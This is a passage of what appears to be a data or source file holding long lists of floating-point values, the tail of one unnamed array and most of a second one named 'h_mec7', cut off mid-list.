4.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 4.0, 2.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 1.0, 2.0, 1.0, 3.0, 4.0, 4.0, 3.0, 3.0, 4.0, 4.0, 1.0, 3.0, 2.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 2.0, 1.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 2.0, 2.0, 4.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 4.0, 3.0, 2.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 4.0, 4.0, 3.0, 2.0, 1.0, 3.0, 3.0, 2.0, 1.0, 2.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 1.0, 2.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 4.0, 2.0, 4.0, 4.0, 1.0, 4.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 4.0, 1.0, 4.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 2.0, 4.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 2.0, 1.0, 2.0, 1.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 3.0, 1.0, 2.0, 4.0, 4.0, 1.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0, 4.0, 2.0, 1.0, 2.0, 3.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 2.0, 4.0, 3.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 2.0, 4.0, 1.0, 4.0, 3.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 2.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 4.0, 1.0, 3.0, 1.0, 4.0, 2.0, 2.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 4.0, 1.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 3.0, 3.0, 3.0, 4.0, 2.0, 2.0, 3.0, 2.0, 3.0, 1.0, 1.0, 2.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 4.0, 3.0, 3.0, 4.0, 1.0, 4.0, 4.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 4.0, 4.0, 2.0, 3.0, 3.0, 4.0]
h_mec7 = [6.0, 6.0, 6.0, 4.0, 6.0, 3.0, 2.0, 6.0, 7.0, 1.0, 7.0, 1.0, 1.0, 3.0, 4.0, 4.0, 4.0, 3.0, 5.0, 4.0, 7.0, 3.0, 6.0, 7.0, 7.0, 4.0, 1.0, 3.0, 6.0, 1.0, 4.0, 4.0, 7.0, 3.0, 1.0, 4.0, 4.0, 6.0, 2.0, 6.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 5.0, 5.0, 2.0, 3.0, 7.0, 3.0, 3.0, 6.0, 4.0, 6.0, 4.0, 1.0, 3.0, 6.0, 7.0, 4.0, 7.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 1.0, 7.0, 7.0, 1.0, 2.0, 1.0, 4.0, 4.0, 7.0, 4.0, 3.0, 3.0, 4.0, 3.0, 4.0, 5.0, 2.0, 5.0, 1.0, 3.0, 4.0, 6.0, 6.0, 4.0, 1.0, 4.0, 6.0, 1.0, 4.0, 6.0, 3.0, 6.0, 3.0, 6.0, 2.0, 6.0, 6.0, 1.0, 4.0, 6.0, 2.0, 3.0, 4.0, 1.0, 2.0, 7.0, 5.0, 7.0, 4.0, 6.0, 6.0, 5.0, 1.0, 6.0, 1.0, 6.0, 4.0, 6.0, 1.0, 4.0, 4.0, 2.0, 6.0, 4.0, 3.0, 3.0, 1.0, 6.0, 7.0, 1.0, 2.0, 6.0, 3.0, 6.0, 6.0, 6.0, 2.0, 5.0, 3.0, 4.0, 1.0, 6.0, 1.0, 3.0, 1.0, 7.0, 7.0, 2.0, 2.0, 4.0, 7.0, 4.0, 6.0, 4.0, 1.0, 4.0, 2.0, 6.0, 2.0, 6.0, 6.0, 4.0, 7.0, 1.0, 4.0, 1.0, 2.0, 4.0, 6.0, 4.0, 1.0, 4.0, 3.0, 6.0, 6.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 3.0, 6.0, 1.0, 1.0, 2.0, 1.0, 6.0, 1.0, 3.0, 1.0, 1.0, 6.0, 1.0, 6.0, 5.0, 6.0, 3.0, 2.0, 1.0, 2.0, 6.0, 2.0, 4.0, 2.0, 2.0, 4.0, 7.0, 1.0, 1.0, 6.0, 4.0, 6.0, 4.0, 2.0, 4.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 3.0, 3.0, 4.0, 3.0, 6.0, 2.0, 1.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 6.0, 1.0, 3.0, 1.0, 1.0, 2.0, 6.0, 2.0, 7.0, 4.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 4.0, 6.0, 5.0, 5.0, 2.0, 3.0, 3.0, 4.0, 2.0, 7.0, 4.0, 4.0, 5.0, 3.0, 7.0, 2.0, 6.0, 2.0, 2.0, 1.0, 7.0, 4.0, 4.0, 2.0, 5.0, 3.0, 1.0, 3.0, 6.0, 1.0, 5.0, 4.0, 4.0, 2.0, 3.0, 5.0, 6.0, 4.0, 2.0, 1.0, 3.0, 6.0, 6.0, 1.0, 7.0, 2.0, 3.0, 1.0, 1.0, 4.0, 1.0, 6.0, 2.0, 4.0, 1.0, 4.0, 6.0, 1.0, 4.0, 6.0, 1.0, 1.0, 6.0, 1.0, 4.0, 1.0, 2.0, 6.0, 4.0, 1.0, 7.0, 7.0, 7.0, 1.0, 3.0, 4.0, 6.0, 1.0, 3.0, 1.0, 3.0, 6.0, 4.0, 6.0, 4.0, 1.0, 7.0, 1.0, 3.0, 4.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 5.0, 1.0, 4.0, 4.0, 6.0, 4.0, 5.0, 6.0, 2.0, 1.0, 4.0, 1.0, 7.0, 2.0, 7.0, 2.0, 1.0, 4.0, 4.0, 2.0, 1.0, 6.0, 4.0, 1.0, 1.0, 6.0, 6.0, 3.0, 1.0, 7.0, 6.0, 3.0, 1.0, 1.0, 3.0, 3.0, 7.0, 1.0, 4.0, 6.0, 2.0, 6.0, 6.0, 3.0, 2.0, 2.0, 6.0, 4.0, 2.0, 2.0, 1.0, 6.0, 6.0, 2.0, 3.0, 6.0, 4.0, 2.0, 7.0, 7.0, 4.0, 4.0, 7.0, 4.0, 7.0, 1.0, 6.0, 2.0, 4.0, 3.0, 5.0, 2.0, 3.0, 6.0, 1.0, 7.0, 1.0, 3.0, 3.0, 1.0, 6.0, 3.0, 3.0, 2.0, 4.0, 2.0, 6.0, 3.0, 3.0, 7.0, 2.0, 7.0, 7.0, 3.0, 1.0, 6.0, 3.0, 2.0, 6.0, 4.0, 7.0, 6.0, 1.0, 2.0, 4.0, 7.0, 3.0, 6.0, 2.0, 5.0, 1.0, 2.0, 4.0, 7.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 1.0, 4.0, 4.0, 6.0, 2.0, 1.0, 3.0, 7.0, 2.0, 5.0, 6.0, 1.0, 5.0, 3.0, 2.0, 3.0, 3.0, 4.0, 3.0, 6.0, 2.0, 5.0, 7.0, 3.0, 5.0, 2.0, 1.0, 6.0, 1.0, 2.0, 2.0, 1.0, 6.0, 7.0, 1.0, 6.0, 1.0, 1.0, 4.0, 1.0, 4.0, 4.0, 4.0, 3.0, 2.0, 4.0, 6.0, 1.0, 7.0, 6.0, 7.0, 7.0, 6.0, 6.0, 3.0, 3.0, 4.0, 4.0, 6.0, 3.0, 1.0, 1.0, 6.0, 3.0, 1.0, 6.0, 1.0, 4.0, 6.0, 6.0, 3.0, 4.0, 4.0, 2.0, 1.0, 6.0, 3.0, 4.0, 1.0, 7.0, 5.0, 6.0, 3.0, 3.0, 3.0, 6.0, 3.0, 4.0, 7.0, 6.0, 7.0, 5.0, 1.0, 1.0, 2.0, 1.0, 7.0, 3.0, 2.0, 6.0, 6.0, 3.0, 7.0, 3.0, 1.0, 4.0, 5.0, 1.0, 3.0, 3.0, 2.0, 6.0, 1.0, 2.0, 1.0, 3.0, 2.0, 6.0, 6.0, 1.0, 5.0, 2.0, 4.0, 7.0, 3.0, 4.0, 2.0, 3.0, 2.0, 1.0, 4.0, 6.0, 1.0, 3.0, 3.0, 1.0, 2.0, 7.0, 1.0, 1.0, 2.0, 2.0, 1.0, 6.0, 2.0, 1.0, 7.0, 6.0, 1.0, 1.0, 4.0, 7.0, 7.0, 6.0, 1.0, 4.0, 7.0, 5.0, 4.0, 6.0, 2.0, 3.0, 2.0, 6.0, 1.0, 4.0, 6.0, 6.0, 1.0, 7.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 7.0, 4.0, 1.0, 2.0, 3.0, 4.0, 1.0, 3.0, 6.0, 2.0, 3.0, 6.0, 3.0, 1.0, 7.0, 1.0, 6.0, 1.0, 3.0, 4.0, 7.0, 3.0, 3.0, 2.0, 2.0, 7.0, 4.0, 1.0, 1.0, 1.0, 4.0, 1.0, 7.0, 6.0, 1.0, 3.0, 7.0, 1.0, 6.0, 1.0, 6.0, 7.0, 1.0, 4.0, 3.0, 2.0, 1.0, 1.0, 3.0, 4.0, 7.0, 3.0, 2.0, 6.0, 3.0, 3.0, 5.0, 6.0, 2.0, 2.0, 1.0, 4.0, 1.0, 5.0, 1.0, 1.0, 4.0, 5.0, 4.0, 2.0, 1.0, 1.0, 5.0, 4.0, 6.0, 1.0, 4.0, 1.0, 1.0, 6.0, 3.0, 6.0, 1.0, 1.0, 2.0, 4.0, 3.0, 1.0, 7.0, 2.0, 4.0, 4.0, 6.0, 3.0, 3.0, 1.0, 6.0, 4.0, 4.0, 6.0, 1.0, 1.0, 1.0, 5.0, 1.0, 3.0, 6.0, 3.0, 4.0, 4.0, 5.0, 4.0, 6.0, 4.0, 2.0, 6.0, 6.0, 1.0, 3.0, 4.0, 1.0, 1.0, 4.0, 1.0, 2.0, 4.0, 6.0, 4.0, 5.0, 4.0, 6.0, 5.0, 1.0, 6.0, 1.0, 3.0, 1.0, 5.0, 4.0, 6.0, 6.0, 6.0, 4.0, 3.0, 3.0, 7.0, 4.0, 3.0, 4.0, 3.0, 3.0, 2.0, 6.0, 2.0, 1.0, 4.0, 6.0, 3.0, 3.0, 1.0, 3.0, 1.0, 4.0, 6.0, 3.0, 2.0, 1.0, 7.0, 3.0, 2.0, 3.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 6.0, 7.0, 1.0, 3.0, 1.0, 6.0, 2.0, 7.0, 3.0, 5.0, 2.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 4.0, 5.0, 3.0, 1.0, 3.0, 1.0, 5.0, 4.0, 2.0, 2.0, 3.0, 4.0, 1.0, 1.0, 6.0, 2.0, 1.0, 3.0, 1.0, 7.0, 1.0, 1.0, 1.0, 2.0, 5.0, 4.0, 3.0, 1.0, 4.0, 2.0, 6.0, 3.0, 6.0, 3.0, 2.0, 3.0, 5.0, 2.0, 3.0, 4.0, 3.0, 7.0, 7.0, 4.0, 1.0, 2.0, 6.0, 3.0, 6.0, 1.0, 3.0, 3.0, 3.0, 7.0, 1.0, 3.0, 1.0, 6.0, 4.0, 6.0, 1.0, 5.0, 6.0, 4.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 6.0, 7.0, 2.0, 7.0, 2.0, 2.0, 2.0, 1.0, 4.0, 5.0, 3.0, 4.0, 1.0, 4.0, 1.0, 3.0, 5.0, 6.0, 4.0, 6.0, 4.0, 1.0, 3.0, 4.0, 4.0, 2.0, 1.0, 2.0, 2.0, 4.0, 7.0, 5.0, 2.0, 1.0, 7.0, 3.0, 4.0, 6.0, 2.0, 7.0, 1.0, 6.0, 3.0, 2.0, 2.0, 1.0, 5.0, 6.0, 1.0, 1.0, 5.0, 3.0, 6.0, 5.0, 3.0, 4.0, 7.0, 5.0, 1.0, 2.0, 3.0, 1.0, 4.0, 6.0, 1.0, 1.0, 6.0, 6.0, 3.0, 4.0, 4.0, 1.0, 1.0, 3.0, 1.0, 4.0, 1.0, 2.0, 3.0, 6.0, 4.0, 4.0, 4.0, 2.0, 4.0, 6.0, 5.0, 3.0, 4.0, 3.0, 1.0, 2.0, 6.0, 6.0, 7.0, 1.0, 4.0, 4.0, 4.0, 6.0, 1.0, 4.0, 7.0, 7.0, 3.0, 4.0, 6.0, 6.0, 7.0, 1.0, 3.0, 5.0, 1.0, 6.0, 6.0, 6.0, 4.0, 7.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 6.0, 6.0, 6.0, 3.0, 6.0, 4.0, 1.0, 7.0, 5.0, 3.0, 4.0, 6.0, 3.0, 1.0, 6.0, 4.0, 1.0, 7.0, 3.0, 7.0, 2.0, 6.0, 1.0, 7.0, 2.0, 4.0, 3.0, 5.0, 4.0, 7.0, 6.0, 4.0, 3.0, 1.0, 1.0, 2.0, 6.0, 1.0, 2.0, 4.0, 4.0, 2.0, 4.0, 4.0, 3.0, 2.0, 3.0, 3.0, 1.0, 7.0, 2.0, 7.0, 7.0, 7.0, 2.0, 3.0, 3.0, 4.0, 5.0, 4.0, 2.0, 5.0, 4.0, 6.0, 1.0, 4.0, 4.0, 7.0, 2.0, 3.0, 2.0, 2.0, 6.0, 6.0, 4.0, 4.0, 4.0, 6.0, 3.0, 3.0, 6.0, 4.0, 2.0, 6.0, 3.0, 3.0, 1.0, 5.0, 1.0, 4.0, 1.0, 6.0, 6.0, 1.0, 7.0, 3.0, 4.0, 6.0, 5.0, 4.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 5.0, 2.0, 3.0, 2.0, 3.0, 4.0, 1.0, 6.0, 1.0, 6.0, 6.0, 7.0, 3.0, 1.0, 3.0, 1.0, 4.0, 3.0, 5.0, 2.0, 2.0, 1.0, 3.0, 1.0, 6.0, 2.0, 5.0, 1.0, 6.0, 1.0, 1.0, 6.0, 7.0, 1.0, 6.0, 4.0, 4.0, 1.0, 4.0, 6.0, 4.0, 4.0, 2.0, 1.0, 1.0, 3.0, 6.0, 3.0, 1.0, 4.0, 3.0, 1.0, 3.0, 7.0, 1.0, 1.0, 6.0, 4.0, 2.0, 3.0, 7.0, 1.0, 1.0, 6.0, 1.0, 5.0, 4.0, 2.0, 2.0, 1.0, 4.0, 3.0, 3.0, 3.0, 6.0, 3.0, 6.0, 6.0, 1.0, 3.0, 6.0, 6.0, 3.0, 5.0, 3.0, 2.0, 4.0, 5.0, 2.0, 1.0, 7.0, 6.0, 1.0, 7.0, 5.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 4.0, 2.0, 3.0, 3.0, 4.0, 6.0, 1.0, 4.0, 6.0, 6.0, 2.0, 6.0, 2.0, 6.0, 1.0, 2.0, 2.0, 2.0, 4.0, 2.0, 3.0, 6.0, 2.0, 1.0, 2.0, 2.0, 7.0, 3.0, 4.0, 6.0, 7.0, 1.0, 2.0, 7.0, 3.0, 4.0, 2.0, 7.0, 1.0, 6.0, 4.0, 6.0, 1.0, 6.0, 7.0, 4.0, 3.0, 6.0, 6.0, 6.0, 1.0, 3.0, 1.0, 6.0, 3.0, 6.0, 2.0, 6.0, 3.0, 1.0, 6.0, 1.0, 3.0, 4.0, 6.0, 1.0, 6.0, 1.0, 4.0, 2.0, 6.0, 3.0, 3.0, 2.0, 4.0, 4.0, 3.0, 2.0, 4.0, 1.0, 2.0, 3.0, 7.0, 3.0, 6.0, 2.0, 1.0, 1.0, 2.0, 6.0, 2.0, 6.0, 1.0, 1.0, 2.0, 2.0, 7.0, 2.0, 7.0, 6.0, 2.0, 2.0, 3.0, 1.0, 1.0, 4.0, 4.0, 2.0, 6.0, 7.0, 4.0, 4.0, 3.0, 3.0, 3.0, 7.0, 7.0, 2.0, 2.0, 7.0, 3.0, 2.0, 2.0, 4.0, 3.0, 4.0, 6.0, 5.0, 6.0, 1.0, 4.0, 3.0, 5.0, 1.0, 7.0, 6.0, 1.0, 1.0, 4.0, 6.0, 3.0, 1.0, 4.0, 1.0, 3.0, 6.0, 1.0, 4.0, 3.0, 4.0, 6.0, 7.0, 4.0, 2.0, 6.0, 1.0, 1.0, 4.0, 5.0, 7.0, 4.0, 1.0, 4.0, 4.0, 7.0, 1.0, 2.0, 7.0, 7.0, 5.0, 1.0, 1.0, 4.0, 7.0, 6.0, 4.0, 4.0, 2.0, 3.0, 4.0, 3.0, 1.0, 4.0, 6.0, 2.0, 4.0, 1.0, 4.0, 4.0, 6.0, 6.0, 7.0, 4.0, 7.0, 4.0, 4.0, 6.0, 5.0, 2.0, 2.0, 1.0, 6.0, 2.0, 3.0, 4.0, 6.0, 4.0, 6.0, 7.0, 1.0, 1.0, 2.0, 4.0, 6.0, 6.0, 1.0, 1.0, 3.0, 5.0, 3.0, 6.0, 1.0, 1.0, 7.0, 5.0, 2.0, 4.0, 6.0, 3.0, 3.0, 4.0, 4.0, 4.0, 7.0, 4.0, 7.0, 4.0, 6.0, 3.0, 3.0, 2.0, 5.0, 2.0, 3.0, 7.0, 1.0, 2.0, 4.0, 2.0, 1.0, 4.0, 4.0, 3.0, 6.0, 6.0, 6.0, 1.0, 1.0, 4.0, 3.0, 3.0, 4.0, 1.0, 3.0, 4.0, 4.0, 2.0, 5.0, 4.0, 3.0, 5.0, 6.0, 1.0, 2.0, 6.0, 4.0, 4.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 6.0, 2.0, 7.0, 4.0, 1.0, 1.0, 1.0, 6.0, 3.0, 4.0, 1.0, 5.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 4.0, 6.0, 1.0, 4.0, 4.0, 6.0, 6.0, 7.0, 2.0, 5.0, 6.0, 4.0, 1.0, 6.0, 4.0, 6.0, 7.0, 1.0, 3.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 1.0, 3.0, 6.0, 6.0, 6.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 4.0, 2.0, 5.0, 2.0, 4.0, 7.0, 4.0, 6.0, 6.0, 7.0, 1.0, 7.0, 1.0, 6.0, 3.0, 6.0, 1.0, 7.0, 1.0, 3.0, 5.0, 1.0, 1.0, 2.0, 6.0, 6.0, 6.0, 3.0, 1.0, 1.0, 6.0, 7.0, 3.0, 7.0, 1.0, 3.0, 2.0, 1.0, 1.0, 2.0, 6.0, 6.0, 6.0, 6.0, 1.0, 2.0, 2.0, 6.0, 1.0, 7.0, 2.0, 4.0, 6.0, 6.0, 3.0, 5.0, 3.0, 3.0, 3.0, 4.0, 7.0, 5.0, 4.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 6.0, 2.0, 1.0, 2.0, 4.0, 7.0, 6.0, 7.0, 4.0, 2.0, 7.0, 2.0, 2.0, 2.0, 2.0, 6.0, 6.0, 7.0, 1.0, 2.0, 6.0, 1.0, 4.0, 5.0, 1.0, 3.0, 2.0, 6.0, 4.0, 7.0, 3.0, 2.0, 3.0, 6.0, 3.0, 3.0, 4.0, 4.0, 3.0, 5.0, 1.0, 3.0, 2.0, 7.0, 7.0, 3.0, 3.0, 6.0, 7.0, 6.0, 4.0, 1.0, 4.0, 4.0, 4.0, 1.0, 6.0, 3.0, 6.0, 1.0, 2.0, 5.0, 1.0, 6.0, 5.0, 3.0, 6.0, 5.0, 4.0, 3.0, 4.0, 1.0, 7.0, 1.0, 1.0, 5.0, 4.0, 1.0, 2.0, 1.0, 7.0, 6.0, 7.0, 3.0, 3.0, 6.0, 3.0, 6.0, 7.0, 5.0, 3.0, 4.0, 1.0, 2.0, 6.0, 4.0, 6.0, 7.0, 3.0, 3.0, 1.0, 6.0, 7.0, 2.0, 3.0, 4.0, 2.0, 7.0, 5.0, 2.0, 6.0, 4.0, 3.0, 4.0, 4.0, 6.0, 6.0, 5.0, 1.0, 7.0, 2.0, 7.0, 3.0, 1.0, 1.0, 4.0, 7.0, 4.0, 7.0, 6.0, 1.0, 3.0, 2.0, 4.0, 1.0, 2.0, 2.0, 6.0, 4.0, 3.0, 1.0, 7.0, 4.0, 2.0, 2.0, 1.0, 3.0, 2.0, 2.0, 5.0, 4.0, 7.0, 4.0, 1.0, 6.0, 6.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 4.0, 7.0, 5.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 4.0, 1.0, 7.0, 6.0, 6.0, 1.0, 2.0, 1.0, 6.0, 6.0, 5.0, 1.0, 7.0, 7.0, 3.0, 3.0, 5.0, 4.0, 6.0, 3.0, 3.0, 6.0, 7.0, 4.0, 3.0, 2.0, 3.0, 5.0, 1.0, 2.0, 3.0, 5.0, 5.0, 1.0, 4.0, 6.0, 1.0, 4.0, 7.0, 2.0, 1.0, 6.0, 5.0, 1.0, 5.0, 5.0, 6.0, 2.0, 2.0, 1.0, 4.0, 3.0, 4.0, 6.0, 3.0, 5.0, 1.0, 7.0, 4.0, 6.0, 1.0, 1.0, 7.0, 1.0, 7.0, 4.0, 1.0, 1.0, 6.0, 1.0, 5.0, 1.0, 4.0, 7.0, 1.0, 7.0, 1.0, 2.0, 7.0, 7.0, 5.0, 6.0, 4.0, 7.0, 7.0, 4.0, 4.0, 4.0, 1.0, 1.0, 6.0, 7.0, 7.0, 6.0, 6.0, 6.0, 4.0, 2.0, 6.0, 1.0, 6.0, 3.0, 2.0, 2.0, 3.0, 1.0, 7.0, 2.0, 4.0, 7.0, 3.0, 4.0, 3.0, 4.0, 2.0, 4.0, 2.0, 6.0, 1.0, 2.0, 5.0, 4.0, 1.0, 2.0, 3.0, 7.0, 4.0, 1.0, 3.0, 4.0, 5.0, 4.0, 2.0, 3.0, 7.0, 2.0, 6.0, 2.0, 3.0, 4.0, 2.0, 1.0, 6.0, 2.0, 4.0, 2.0, 3.0, 1.0, 4.0, 4.0, 3.0, 5.0, 6.0, 7.0, 1.0, 4.0, 2.0, 1.0, 2.0, 6.0, 4.0, 6.0, 2.0, 1.0, 6.0, 3.0, 4.0, 1.0, 6.0, 2.0, 4.0, 2.0, 2.0, 5.0, 4.0, 6.0, 6.0, 1.0, 1.0, 6.0, 6.0, 3.0, 1.0, 7.0, 4.0, 6.0, 6.0, 5.0, 1.0, 5.0, 2.0, 1.0, 4.0, 1.0, 2.0, 4.0, 2.0, 4.0, 7.0, 2.0, 3.0, 2.0, 4.0, 7.0, 3.0, 3.0, 1.0, 4.0, 6.0, 6.0, 5.0, 2.0, 1.0, 6.0, 6.0, 6.0, 7.0, 2.0, 4.0, 6.0, 2.0, 4.0, 6.0, 7.0, 2.0, 3.0, 6.0, 6.0, 1.0, 2.0, 5.0, 3.0, 6.0, 3.0, 5.0, 1.0, 3.0, 4.0, 3.0, 3.0, 7.0, 4.0, 1.0, 2.0, 2.0, 2.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 1.0, 2.0, 6.0, 7.0, 4.0, 1.0, 1.0, 4.0, 6.0, 4.0, 4.0, 6.0, 4.0, 1.0, 7.0, 2.0, 4.0, 1.0, 6.0, 6.0, 2.0, 2.0, 6.0, 7.0, 4.0, 3.0, 6.0, 6.0, 3.0, 7.0, 4.0, 1.0, 3.0, 1.0, 4.0, 3.0, 6.0, 7.0, 3.0, 3.0, 5.0, 6.0, 6.0, 7.0, 7.0, 1.0, 4.0, 1.0, 6.0, 4.0, 4.0, 3.0, 1.0, 2.0, 5.0, 1.0, 3.0, 3.0, 4.0, 4.0, 5.0, 3.0, 4.0, 1.0, 1.0, 5.0, 3.0, 2.0, 6.0, 1.0, 3.0, 3.0, 1.0, 4.0, 6.0, 2.0, 1.0, 1.0, 3.0, 6.0, 6.0, 7.0, 6.0, 6.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 2.0, 1.0, 5.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 7.0, 4.0, 5.0, 7.0, 3.0, 4.0, 6.0, 6.0, 7.0, 1.0, 1.0, 5.0, 2.0, 7.0, 3.0, 3.0, 6.0, 2.0, 1.0, 7.0, 2.0, 6.0, 1.0, 6.0, 7.0, 1.0, 7.0, 6.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 7.0, 3.0, 1.0, 1.0, 7.0, 4.0, 2.0, 6.0, 4.0, 6.0, 6.0, 1.0, 1.0, 3.0, 3.0, 4.0, 2.0, 3.0, 4.0, 4.0, 1.0, 1.0, 2.0, 2.0, 4.0, 7.0, 1.0, 4.0, 6.0, 4.0, 1.0, 1.0, 4.0, 6.0, 4.0, 1.0, 3.0, 3.0, 2.0, 7.0, 5.0, 3.0, 6.0, 6.0, 3.0, 4.0, 2.0, 2.0, 4.0, 5.0, 1.0, 1.0, 7.0, 6.0, 6.0, 3.0, 3.0, 4.0, 4.0, 2.0, 7.0, 6.0, 2.0, 3.0, 6.0, 1.0, 2.0, 2.0, 1.0, 6.0, 4.0, 6.0, 7.0, 3.0, 6.0, 6.0, 4.0, 4.0, 4.0, 6.0, 4.0, 6.0, 6.0, 1.0, 5.0, 4.0, 3.0, 6.0, 1.0, 1.0, 1.0, 3.0, 5.0, 1.0, 7.0, 6.0, 4.0, 4.0, 1.0, 2.0, 3.0, 7.0, 7.0, 6.0, 6.0, 2.0, 7.0, 4.0, 1.0, 7.0, 2.0, 3.0, 2.0, 6.0, 5.0, 6.0, 5.0, 2.0, 3.0, 6.0, 7.0, 1.0, 4.0, 7.0, 7.0, 3.0, 2.0, 6.0, 1.0, 1.0, 2.0, 2.0, 6.0, 2.0, 7.0, 1.0, 6.0, 2.0, 6.0, 4.0, 3.0, 4.0, 1.0, 6.0, 4.0, 3.0, 5.0, 3.0, 2.0, 4.0, 2.0, 2.0, 4.0, 7.0, 4.0, 3.0, 3.0, 6.0, 1.0, 2.0, 7.0, 5.0, 1.0, 4.0, 3.0, 5.0, 2.0, 6.0, 7.0, 3.0, 6.0, 1.0, 3.0, 7.0, 7.0, 2.0, 2.0, 6.0, 2.0, 2.0, 3.0, 6.0, 6.0, 2.0, 6.0, 6.0, 6.0, 6.0, 6.0, 2.0, 6.0, 4.0, 6.0, 4.0, 7.0, 6.0, 2.0, 6.0, 2.0, 7.0, 4.0, 5.0, 6.0, 4.0, 1.0, 6.0, 7.0, 5.0, 6.0, 1.0, 6.0, 6.0, 1.0, 3.0, 4.0, 2.0, 3.0, 2.0, 6.0, 3.0, 